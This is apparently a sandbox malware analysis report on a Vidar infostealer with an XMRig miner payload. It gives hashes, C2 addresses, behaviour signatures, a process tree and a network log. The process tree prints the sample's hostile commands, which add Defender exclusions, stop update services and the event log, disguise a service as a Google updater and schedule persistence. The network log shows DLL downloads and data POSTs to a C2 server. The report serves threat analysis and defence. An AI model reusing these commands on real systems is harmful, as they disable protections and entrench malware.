Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/10/2024, 08:22 UTC

General

  • Target

    2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe

  • Size

    17.5MB

  • MD5

    1603ae955d010896283442534a8ad39c

  • SHA1

    90101b5164c138f227d7add871c1f629bd6d083d

  • SHA256

    34d99b2a6ed62e5080c9448ab3728066c6db5f997212ef71bd2705c79b19fc09

  • SHA512

    e1c8d2ba780d98ff7a845543d35fdf7a2f2092d66295d82cfa07a0d6b64dda58db913967e4f595538f43ac94e88d97e3bfb762205f5588a675ba9abd2ceadb9e

  • SSDEEP

    98304:E33JumYT82ylgsN0Nbh0pgnu99UHxh+VU1KSmv+4mn:A8hggIuh+VUvmmn

Malware Config

Extracted

Family

vidar

Version

11

Botnet

346a77fbabba142b23c256004b5a7c5d

C2

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Signatures

  • Detect Vidar Stealer 16 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Power Settings 1 TTPs 12 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-10-05_1603ae955d010896283442534a8ad39c_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\ProgramData\HCFCAAEBGC.exe
        "C:\ProgramData\HCFCAAEBGC.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        PID:2344
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4072
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3612
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            5⤵
              PID:4484
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            4⤵
            • Launches sc.exe
            PID:388
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            4⤵
            • Launches sc.exe
            PID:4392
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            4⤵
            • Launches sc.exe
            PID:2504
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            4⤵
            • Launches sc.exe
            PID:3560
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            4⤵
            • Launches sc.exe
            PID:2588
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:4972
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:696
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:5032
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            4⤵
            • Power Settings
            • Suspicious use of AdjustPrivilegeToken
            PID:3352
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
            4⤵
            • Launches sc.exe
            PID:4852
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
            4⤵
            • Launches sc.exe
            PID:2580
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            4⤵
            • Launches sc.exe
            PID:3100
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
            4⤵
            • Launches sc.exe
            PID:3344
        • C:\ProgramData\CGCFBFBGHD.exe
          "C:\ProgramData\CGCFBFBGHD.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:764
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2564
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:1020
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AAFHIIDHJEBF" & exit
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3244
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            4⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2312
    • C:\ProgramData\GoogleUP\Chrome\Updater.exe
      C:\ProgramData\GoogleUP\Chrome\Updater.exe
      1⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4996
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4488
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
            PID:1644
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          2⤵
          • Launches sc.exe
          PID:4948
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          2⤵
          • Launches sc.exe
          PID:2956
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          2⤵
          • Launches sc.exe
          PID:3268
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          2⤵
          • Launches sc.exe
          PID:3432
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          2⤵
          • Launches sc.exe
          PID:2760
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:4144
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:5036
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:532
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          2⤵
          • Power Settings
          • Suspicious use of AdjustPrivilegeToken
          PID:2384
        • C:\Windows\system32\conhost.exe
          C:\Windows\system32\conhost.exe
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2224
          • C:\ProgramData\GoogleUP\Chrome\Updater.exe
            "C:\ProgramData\GoogleUP\Chrome\Updater.exe"
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2600
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3524
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                  PID:2580
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                4⤵
                • Launches sc.exe
                PID:756
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                4⤵
                • Launches sc.exe
                PID:4896
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                4⤵
                • Launches sc.exe
                PID:4740
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                4⤵
                • Launches sc.exe
                PID:2608
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                4⤵
                • Launches sc.exe
                PID:1936
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                4⤵
                • Power Settings
                • Suspicious use of AdjustPrivilegeToken
                PID:1052
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                4⤵
                • Power Settings
                • Suspicious use of AdjustPrivilegeToken
                PID:4308
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                4⤵
                • Power Settings
                • Suspicious use of AdjustPrivilegeToken
                PID:312
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                4⤵
                • Power Settings
                • Suspicious use of AdjustPrivilegeToken
                PID:4804
              • C:\Windows\explorer.exe
                explorer.exe
                4⤵
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1220
          • C:\Windows\explorer.exe
            explorer.exe
            2⤵
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:724
        • C:\Users\Admin\AppData\Roaming\service.exe
          C:\Users\Admin\AppData\Roaming\service.exe
          1⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2212
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4952
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn MyApp /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:4448

        Network

        • flag-us
          DNS
          209.205.72.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          209.205.72.20.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          88.210.23.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          88.210.23.2.in-addr.arpa
          IN PTR
          Response
          88.210.23.2.in-addr.arpa
          IN PTR
          a2-23-210-88deploystaticakamaitechnologiescom
        • flag-us
          DNS
          133.32.126.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          133.32.126.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          228.249.119.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          228.249.119.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          steamcommunity.com
          BitLockerToGo.exe
          Remote address:
          8.8.8.8:53
          Request
          steamcommunity.com
          IN A
          Response
          steamcommunity.com
          IN A
          104.82.234.109
        • flag-gb
          GET
          https://steamcommunity.com/profiles/76561199780418869
          BitLockerToGo.exe
          Remote address:
          104.82.234.109:443
          Request
          GET /profiles/76561199780418869 HTTP/1.1
          Host: steamcommunity.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Content-Type: text/html; charset=UTF-8
          Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
          Expires: Mon, 26 Jul 1997 05:00:00 GMT
          Cache-Control: no-cache
          Date: Sat, 05 Oct 2024 08:22:43 GMT
          Content-Length: 34935
          Connection: keep-alive
          Set-Cookie: sessionid=401345caf6536c5d4b8d8477; Path=/; Secure; SameSite=None
          Set-Cookie: steamCountry=GB%7Ce15d564837abb028acb4e114150d704d; Path=/; Secure; HttpOnly; SameSite=None
        • flag-de
          GET
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET / HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:44 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-us
          DNS
          9.197.12.49.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          9.197.12.49.in-addr.arpa
          IN PTR
          Response
          9.197.12.49.in-addr.arpa
          IN PTR
          static91971249clients your-serverde
        • flag-us
          DNS
          109.234.82.104.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          109.234.82.104.in-addr.arpa
          IN PTR
          Response
          109.234.82.104.in-addr.arpa
          IN PTR
          a104-82-234-109deploystaticakamaitechnologiescom
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HIJJEGDBFIIDGCAKJEBK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:44 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:45 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:45 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IJKKKFCFHCFIECBGDHID
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 4661
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          GET
          https://49.12.197.9/sqlp.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /sqlp.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:46 GMT
          Content-Type: application/octet-stream
          Content-Length: 2459136
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:46 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          GET
          https://49.12.197.9/freebl3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /freebl3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:48 GMT
          Content-Type: application/octet-stream
          Content-Length: 685392
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:48 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/mozglue.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /mozglue.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 608080
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/msvcp140.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /msvcp140.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 450024
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/softokn3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /softokn3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:49 GMT
          Content-Type: application/octet-stream
          Content-Length: 257872
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:49 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/vcruntime140.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /vcruntime140.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 80880
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          GET
          https://49.12.197.9/nss3.dll
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          GET /nss3.dll HTTP/1.1
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:50 GMT
          Content-Type: application/octet-stream
          Content-Length: 2046288
          Connection: keep-alive
          Last-Modified: Saturday, 05-Oct-2024 08:22:50 GMT
          Cache-Control: no-store, no-cache
          Accept-Ranges: bytes
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 1025
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Sat, 05 Oct 2024 08:22:51 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • flag-de
          POST
          https://49.12.197.9/
          BitLockerToGo.exe
          Remote address:
          49.12.197.9:443
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----IDBGHDGHCGHCAAKFIIEC
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
          Host: 49.12.197.9
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
